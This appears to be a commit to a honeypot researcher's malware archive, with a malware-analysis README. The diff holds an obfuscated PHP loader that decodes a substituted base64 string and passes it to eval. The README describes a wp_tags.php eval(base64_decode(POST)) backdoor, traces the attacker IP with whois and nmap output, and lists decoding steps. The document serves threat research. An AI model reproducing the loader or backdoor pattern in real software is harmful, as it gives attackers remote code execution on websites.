Add 188.120.231.151-2018-01-07a/ and materials

Author: bediger4000

178.210.90.90-2017-11-28a/[email protected]

@@ -1,4 +1,4 @@
-
+<?php
  $tdstekujbk = 6406; function ytaoyaxksn($diwslyf, $lojiirm){$qtwzlchss = ''; for($i=0; $i < strlen($diwslyf); $i++){$qtwzlchss .= isset($lojiirm[$diwslyf[$i]]) ? $lojiirm[$diwslyf[$i]] : $diwslyf[$i];}
 $vofcivdhr="base" . "64_decode";return $vofcivdhr($qtwzlchss);}
 $pefchv = 'avsqOkcS8J2CsnPZ7sBzCuBffs7VfUsnFmWIRJ4MHfN4akaNbqZTFurZfs7PQuAg7sBffs7HgnsnFmWIRg4MHfN4akaNbqZTFurZ'.
@@ -611,4 +611,4 @@ $pefchv = 'avsqOkcS8J2CsnPZ7sBzCuBffs7VfUsnFmWIRJ4MHfN4akaNbqZTFurZfs7PQuAg7sBff
 'smOsBWGQ7T8C3rJLxIVJASG9j5VJFsZ4WEO17U0HT5ymVIyLx4aXs3bPBu0q4IyLxLVuFPZu7ggZrZ7ZfLVJtI'.
 'ZnjfQUsiCH3rJXUrJI==';
 $jjfkuiqqq = Array('1'=>'H', '0'=>'c', '3'=>'s', '2'=>'d', '5'=>'v', '4'=>'k', '7'=>'R', '6'=>'r', '9'=>'2', '8'=>'K', 'A'=>'B', 'C'=>'T', 'B'=>'9', 'E'=>'j', 'D'=>'e', 'G'=>'Y', 'F'=>'J', 'I'=>'g', 'H'=>'D', 'K'=>'t', 'J'=>'C', 'M'=>'7', 'L'=>'i', 'O'=>'a', 'N'=>'p', 'Q'=>'X', 'P'=>'F', 'S'=>'l', 'R'=>'M', 'U'=>'0', 'T'=>'o', 'W'=>'w', 'V'=>'I', 'Y'=>'u', 'X'=>'n', 'Z'=>'U', 'a'=>'Z', 'c'=>'5', 'b'=>'b', 'e'=>'z', 'd'=>'f', 'g'=>'S', 'f'=>'Q', 'i'=>'P', 'h'=>'x', 'k'=>'W', 'j'=>'h', 'm'=>'y', 'l'=>'3', 'o'=>'8', 'n'=>'E', 'q'=>'m', 'p'=>'q', 's'=>'V', 'r'=>'N', 'u'=>'1', 't'=>'4', 'w'=>'6', 'v'=>'G', 'y'=>'L', 'x'=>'A', 'z'=>'O');
-eval/*vdcjpxb*/(ytaoyaxksn($pefchv, $jjfkuiqqq));
+eval/*vdcjpxb*/(ytaoyaxksn($pefchv, $jjfkuiqqq));

188.120.231.151-2018-01-07a/188.120.231.151WlKFM2Qsvi2M-Lm8wDxFZgAAAAc.wso.scans

@@ -0,0 +1,291 @@
+# Plausibly Deniable Blind SQL Injection
+
+Cut-out program that tries to check for SQL injections in one of a random number
+of web sites included in the code.
+
+## Origin
+
+Downloaded to my WordPress honey pot. I coded the honey pot to emulate some
+of the simpler back doors I found in malware otherwise downloaded to the honey pot.
+The comment in the code of the honey pot says "Emulate wp_tags.php backdoor".
+I can't find the original `wp_tags.php` backdoor malware, but the indications
+of POST parameters `fack` and `key` exist in the information the honey pot code
+left behind.
+
+It appears that `wp_tags.php` would just do `eval(base64_decode($_POST['fack']);`
+I'm not at all sure what value the `key` parameter provides. It looks like `fack`
+comes in as part of the POST method parameters, while `key` appears as a name/value
+pair in the URL itself. This seems weird.
+
+### IP Address 188.120.231.151
+
+DNS says 188.120.231.151 → andropov.vasilii.fvds.ru
+
+`whois` says 188.120.231.151 belongs in 188.120.224.0/20AS29182
+
+    netname:        THEFIRST-NET
+    org:            ORG-FVDS1-RIPE
+    descr:          TheFirst-RU clients (WebDC Msk)
+
+That AS appears to belong  to an ISP in Irkutsk, Russia.
+
+    % whois fvds.ru
+
+    domain:        FVDS.RU
+    org:           CJSC "Pervyj"
+    registrar:     REGTIME-RU
+    admin-contact: https://whois.webnames.ru
+
+Not much to follow there.
+
+`p0f3` says that 188.120.231.151 runs Linux 3.1-3.10
+
+    [2018/01/06 14:24:07] mod=syn|cli=188.120.231.151/33334|srv=162.246.45.144/80|subj=cli|os=Linux 3.1-3.10|dist=10|params=none|raw_sig=4:54+10:0:1460:mss*10,7:mss,sok,ts,nop,ws:df,id+:0
+
+`nmap -A` thinks this IP address runs Linux 3.X, OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16,
+even more specifically, Debian 4+deb7u6
+
+<!--
+Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 14:43 MST
+Nmap scan report for andropov.vasilii.fvds.ru (188.120.231.151)
+Host is up (0.19s latency).
+Not shown: 986 closed ports
+PORT      STATE    SERVICE      VERSION
+21/tcp    open     ftp          ProFTPD 1.3.4a
+| ssl-cert: Subject: commonName=example.com/organizationName=XX/stateOrProvinceName=XX/countryName=XX
+| Not valid before: 2017-08-16T03:39:09
+|_Not valid after:  2027-08-14T03:39:09
+|_ssl-date: TLS randomness does not represent time
+22/tcp    open     ssh          OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
+| ssh-hostkey: 
+|   1024 41:48:e5:82:c6:5b:3e:5c:9a:f6:53:f3:92:79:49:58 (DSA)
+|   2048 06:7a:92:2f:2a:ac:fd:1e:a6:40:55:47:1e:0f:19:82 (RSA)
+|_  256 c8:e4:2d:32:32:2d:3b:37:b3:b7:4d:fb:6d:f9:b2:2c (ECDSA)
+25/tcp    open     smtp         Exim smtpd 4.80
+| smtp-commands: andropov.vasilii.fvds.ru Hello andropov.vasilii.fvds.ru [162.246.45.144], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN CRAM-MD5, STARTTLS, HELP, 
+|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP 
+| ssl-cert: Subject: commonName=andropov/organizationName=XX/stateOrProvinceName=XX/countryName=XX
+| Not valid before: 2017-08-16T03:38:06
+|_Not valid after:  2027-08-14T03:38:06
+|_ssl-date: 2018-01-07T21:45:36+00:00; -1s from scanner time.
+53/tcp    open     domain
+| dns-nsid: 
+|_  bind.version: 9.8.4-rpz2+rl005.12-P1
+80/tcp    open     http         Apache httpd 2.2.22
+| http-auth: 
+| HTTP/1.1 401 Authorization Required\x0D
+|_  Basic realm=sib service
+|_http-server-header: Apache/2.2.22 (Debian)
+|_http-title: 401 Authorization Required
+110/tcp   open     pop3         Dovecot pop3d
+|_pop3-capabilities: UIDL PIPELINING RESP-CODES CAPA SASL(PLAIN LOGIN DIGEST-MD5 CRAM-MD5) STLS TOP USER
+| ssl-cert: Subject: commonName=andropov/organizationName=XX/stateOrProvinceName=XX/countryName=XX
+| Not valid before: 2017-08-16T03:38:06
+|_Not valid after:  2027-08-14T03:38:06
+|_ssl-date: TLS randomness does not represent time
+111/tcp   open     rpcbind      2-4 (RPC #100000)
+| rpcinfo: 
+|   program version   port/proto  service
+|   100000  2,3,4        111/tcp  rpcbind
+|   100000  2,3,4        111/udp  rpcbind
+|   100024  1          44219/tcp  status
+|_  100024  1          45750/udp  status
+143/tcp   open     imap         Dovecot imapd
+|_imap-capabilities: IMAP4rev1 listed LOGIN-REFERRALS IDLE AUTH=PLAIN AUTH=LOGIN LITERAL+ Pre-login AUTH=CRAM-MD5A0001 ID STARTTLS OK have ENABLE post-login capabilities SASL-IR AUTH=DIGEST-MD5 more
+| ssl-cert: Subject: commonName=andropov/organizationName=XX/stateOrProvinceName=XX/countryName=XX
+| Not valid before: 2017-08-16T03:38:06
+|_Not valid after:  2027-08-14T03:38:06
+|_ssl-date: TLS randomness does not represent time
+465/tcp   open     ssl/smtp     Exim smtpd 4.80
+| smtp-commands: andropov.vasilii.fvds.ru Hello andropov.vasilii.fvds.ru [162.246.45.144], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN CRAM-MD5, HELP, 
+|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP 
+| ssl-cert: Subject: commonName=andropov/organizationName=XX/stateOrProvinceName=XX/countryName=XX
+| Not valid before: 2017-08-16T03:38:06
+|_Not valid after:  2027-08-14T03:38:06
+|_ssl-date: 2018-01-07T21:45:36+00:00; 0s from scanner time.
+587/tcp   open     smtp         Exim smtpd 4.80
+| smtp-commands: andropov.vasilii.fvds.ru Hello andropov.vasilii.fvds.ru [162.246.45.144], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN CRAM-MD5, STARTTLS, HELP, 
+|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP 
+| ssl-cert: Subject: commonName=andropov/organizationName=XX/stateOrProvinceName=XX/countryName=XX
+| Not valid before: 2017-08-16T03:38:06
+|_Not valid after:  2027-08-14T03:38:06
+|_ssl-date: 2018-01-07T21:45:37+00:00; 0s from scanner time.
+993/tcp   open     ssl/imap     Dovecot imapd
+|_imap-capabilities: IMAP4rev1 listed LOGIN-REFERRALS IDLE AUTH=PLAIN AUTH=LOGIN LITERAL+ Pre-login AUTH=CRAM-MD5A0001 ID OK SASL-IR ENABLE have post-login capabilities AUTH=DIGEST-MD5 more
+| ssl-cert: Subject: commonName=andropov/organizationName=XX/stateOrProvinceName=XX/countryName=XX
+| Not valid before: 2017-08-16T03:38:06
+|_Not valid after:  2027-08-14T03:38:06
+|_ssl-date: TLS randomness does not represent time
+995/tcp   open     ssl/pop3     Dovecot pop3d
+|_pop3-capabilities: UIDL PIPELINING RESP-CODES CAPA SASL(PLAIN LOGIN DIGEST-MD5 CRAM-MD5) TOP USER
+| ssl-cert: Subject: commonName=andropov/organizationName=XX/stateOrProvinceName=XX/countryName=XX
+| Not valid before: 2017-08-16T03:38:06
+|_Not valid after:  2027-08-14T03:38:06
+|_ssl-date: TLS randomness does not represent time
+1500/tcp  open     ssl/vlsi-lm?
+| fingerprint-strings: 
+|   FourOhFourRequest: 
+|     HTTP/1.0 404 Not Found
+|     Content-Length: 2715
+|     Date: Sun, 07 Jan 2018 21:44:25 GMT
+|     <!DOCTYPE html>
+|     <html>
+|     <head>
+|     <title>404 Not Found</title>
+|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
+|     <style>
+|     body {
+|     font-weight: normal;
+|     font-size: 11px;
+|     font-family: Arial;
+|     .fatal-error {
+|     width: 270px;
+|     height: 270px;
+|     margin: 0 auto;
+|     position: absolute;
+|     top: 50%;
+|     left: 50%;
+|     margin-left: -135px;
+|     margin-top: -135px;
+|     .fatal-error-round {
+|     width: 270px;
+|     height: 270px;
+|     background: #FF8356;
+|     border-radius: 270px;
+|     .fatal-error-inner {
+|     padding-top: 23px;
+|     text-align: center;
+|     .fatal-error-sign {
+|     margin-bottom: 10px;
+|     .fatal-error-sign-top {
+|     background: #FFF;
+|     width: 14px;
+|     height: 7px;
+|     border-radius: 28px
+|   GetRequest: 
+|     HTTP/1.0 200 OK
+|     Connection: close
+|     Content-Type: text/html; charset=UTF-8
+|     Pragma: no-cache
+|     Cache-Control: no-cache
+|     Expires: 0
+|     Set-Cookie: ispmgrses5=; path=/; HttpOnly; expires=Tue, 08 Jan 2019 00:43:39 MSK
+|     Set-Cookie: ispmgrlang5=orion:en; path=/; expires=Tue, 08 Jan 2019 00:43:39 MSK
+|     X-Frame-Options: SAMEORIGIN
+|     Date: Sun, 07 Jan 2018 21:43:39 GMT
+|     <!DOCTYPE html><html>
+|     <head>
+|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
+|     <title>Authorization</title>
+|     <link rel="stylesheet" href="/manimg/orion/default/main.css" type="text/css">
+|     <link rel="shortcut icon" href="/manimg/orion/default/favicon-ispmgr.ico" type="image/x-icon">
+|     <link rel="mask-icon" href="https:///manimg/common/maskicon/ispmgr.svg" color="#000000">
+|     <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=yes">
+|     </head>
+|     <body class="b
+|   HTTPOptions: 
+|     HTTP/1.0 200 OK
+|     Content-Length: 0
+|     Date: Sun, 07 Jan 2018 21:43:41 GMT
+|   RTSPRequest: 
+|     HTTP/1.1 200 OK
+|     Content-Length: 0
+|_    Date: Sun, 07 Jan 2018 21:43:42 GMT
+| ssl-cert: Subject: commonName=l5d11eab.justinstalledpanel.com
+| Subject Alternative Name: DNS:l5d11eab.justinstalledpanel.com
+| Not valid before: 2017-08-16T02:36:00
+|_Not valid after:  2017-11-14T02:36:00
+|_ssl-date: 2018-01-07T21:45:35+00:00; 0s from scanner time.
+49152/tcp filtered unknown
+1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+SF-Port1500-TCP:V=7.60%T=SSL%I=7%D=1/7%Time=5A52948C%P=x86_64-unknown-linu
+SF:x-gnu%r(GetRequest,16DA,"HTTP/1\.0\x20200\x20OK\r\nConnection:\x20close
+SF:\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nPragma:\x20no-cache
+SF:\r\nCache-Control:\x20no-cache\r\nExpires:\x200\r\nSet-Cookie:\x20ispmg
+SF:rses5=;\x20path=/;\x20HttpOnly;\x20expires=Tue,\x2008\x20Jan\x202019\x2
+SF:000:43:39\x20MSK\r\nSet-Cookie:\x20ispmgrlang5=orion:en;\x20path=/;\x20
+SF:expires=Tue,\x2008\x20Jan\x202019\x2000:43:39\x20MSK\r\nX-Frame-Options
+SF::\x20SAMEORIGIN\r\nDate:\x20Sun,\x2007\x20Jan\x202018\x2021:43:39\x20GM
+SF:T\r\n\r\n<!DOCTYPE\x20html><html>\n<head>\n<meta\x20http-equiv=\"Conten
+SF:t-Type\"\x20content=\"text/html;\x20charset=UTF-8\">\n<title>Authorizat
+SF:ion</title>\n<link\x20rel=\"stylesheet\"\x20href=\"/manimg/orion/defaul
+SF:t/main\.css\"\x20type=\"text/css\">\n<link\x20rel=\"shortcut\x20icon\"\
+SF:x20href=\"/manimg/orion/default/favicon-ispmgr\.ico\"\x20type=\"image/x
+SF:-icon\">\n<link\x20rel=\"mask-icon\"\x20href=\"https:///manimg/common/m
+SF:askicon/ispmgr\.svg\"\x20color=\"#000000\">\n<meta\x20name=\"viewport\"
+SF:\x20content=\"width=device-width,\x20initial-scale=1\.0,\x20minimum-sca
+SF:le=1\.0,\x20maximum-scale=1\.0,\x20user-scalable=yes\">\n</head>\n<body
+SF:\x20class=\"b")%r(HTTPOptions,4B,"HTTP/1\.0\x20200\x20OK\r\nContent-Len
+SF:gth:\x200\r\nDate:\x20Sun,\x2007\x20Jan\x202018\x2021:43:41\x20GMT\r\n\
+SF:r\n")%r(RTSPRequest,4B,"HTTP/1\.1\x20200\x20OK\r\nContent-Length:\x200\
+SF:r\nDate:\x20Sun,\x2007\x20Jan\x202018\x2021:43:42\x20GMT\r\n\r\n")%r(Fo
+SF:urOhFourRequest,AF0,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Length
+SF::\x202715\r\nDate:\x20Sun,\x2007\x20Jan\x202018\x2021:44:25\x20GMT\r\n\
+SF:r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20<title>404\x20Not\x20Fou
+SF:nd</title>\n\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"t
+SF:ext/html;\x20charset=UTF-8\">\n\x20\x20<style>\n\x20\x20\x20\x20body\x2
+SF:0{\n\x20\x20\x20\x20\x20\x20font-weight:\x20normal;\n\x20\x20\x20\x20\x
+SF:20\x20font-size:\x2011px;\n\x20\x20\x20\x20\x20\x20font-family:\x20Aria
+SF:l;\n\x20\x20\x20\x20}\n\x20\x20\x20\x20\.fatal-error\x20{\n\x20\x20\x20
+SF:\x20\x20\x20width:\x20270px;\n\x20\x20\x20\x20\x20\x20height:\x20270px;
+SF:\n\x20\x20\x20\x20\x20\x20margin:\x200\x20auto;\n\x20\x20\x20\x20\x20\x
+SF:20position:\x20absolute;\n\x20\x20\x20\x20\x20\x20top:\x2050%;\n\x20\x2
+SF:0\x20\x20\x20\x20left:\x2050%;\n\x20\x20\x20\x20\x20\x20margin-left:\x2
+SF:0-135px;\n\x20\x20\x20\x20\x20\x20margin-top:\x20-135px;\n\x20\x20\x20\
+SF:x20}\n\x20\x20\x20\x20\.fatal-error-round\x20{\n\x20\x20\x20\x20\x20\x2
+SF:0width:\x20270px;\n\x20\x20\x20\x20\x20\x20height:\x20270px;\n\x20\x20\
+SF:x20\x20\x20\x20background:\x20#FF8356;\n\x20\x20\x20\x20\x20\x20border-
+SF:radius:\x20270px;\n\x20\x20\x20\x20}\n\x20\x20\x20\x20\.fatal-error-inn
+SF:er\x20{\n\x20\x20\x20\x20\x20\x20padding-top:\x2023px;\n\x20\x20\x20\x2
+SF:0\x20\x20text-align:\x20center;\n\x20\x20\x20\x20}\n\x20\x20\x20\x20\.f
+SF:atal-error-sign\x20{\n\x20\x20\x20\x20\x20\x20margin-bottom:\x2010px;\n
+SF:\x20\x20\x20\x20}\n\x20\x20\x20\x20\.fatal-error-sign-top\x20{\n\x20\x2
+SF:0\x20\x20\x20\x20background:\x20#FFF;\n\x20\x20\x20\x20\x20\x20width:\x
+SF:2014px;\n\x20\x20\x20\x20\x20\x20height:\x207px;\n\x20\x20\x20\x20\x20\
+SF:x20border-radius:\x2028px");
+Device type: general purpose
+Running: Linux 3.X
+OS CPE: cpe:/o:linux:linux_kernel:3
+OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
+Network Distance: 15 hops
+Service Info: Host: 188.120.231.151; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+TRACEROUTE (using port 554/tcp)
+HOP RTT       ADDRESS
+1   16.38 ms  129-45-246-162.versonetworks.net (162.246.45.129)
+2   16.40 ms  10.100.100.2
+3   21.24 ms  10.100.100.1
+4   44.14 ms  100ge14-1.core1.mci3.he.net (184.105.64.50)
+5   46.66 ms  100ge14-1.core1.mci3.he.net (184.105.64.50)
+6   84.65 ms  100ge8-1.core2.chi1.he.net (184.105.81.210)
+7   61.81 ms  100ge16-1.core1.nyc4.he.net (184.105.223.162)
+8   167.70 ms 100ge6-2.core1.ams1.he.net (72.52.92.214)
+9   157.90 ms 100ge6-2.core1.ams1.he.net (72.52.92.214)
+10  185.58 ms xe-7-0-0.mbr1.msk1.ip.di-net.ru (213.248.7.88)
+11  185.61 ms xe-7-0-0.mbr1.msk1.ip.di-net.ru (213.248.7.88)
+12  185.65 ms te2-1.sr7.msk1.ip.di-net.ru (213.248.3.31)
+13  185.65 ms vlan-794.sr2.msk4.ip.di-net.ru (213.248.3.76)
+14  185.65 ms core.webdc.ru (92.63.108.98)
+15  185.68 ms andropov.vasilii.fvds.ru (188.120.231.151)
+
+OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 160.25 seconds
+-->
+
+## Decoding
+
+1. Hand-edit the `fack` POST parameter into `fack.php`
+2. Invoke `php fack.php > dc1.php`
+
+`dc1.php` appears to be the code that `wp_tags.php` was intended to execute.
+
+## Analysis
+
+This is what the program could return as an HTTP response:
+
+   ||stratigery.com/wp-content/plugins/wp_module/wp_tags.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG|| ololo
+
+The "stratigery.com" URL is Base64-encoded into the code downloaded to the fake WSO.
+The attacker creates new code containing the domain name of the web site being attacked.
+
+Were the web sites checked for SQLi also encoded-in, on a per-site basis?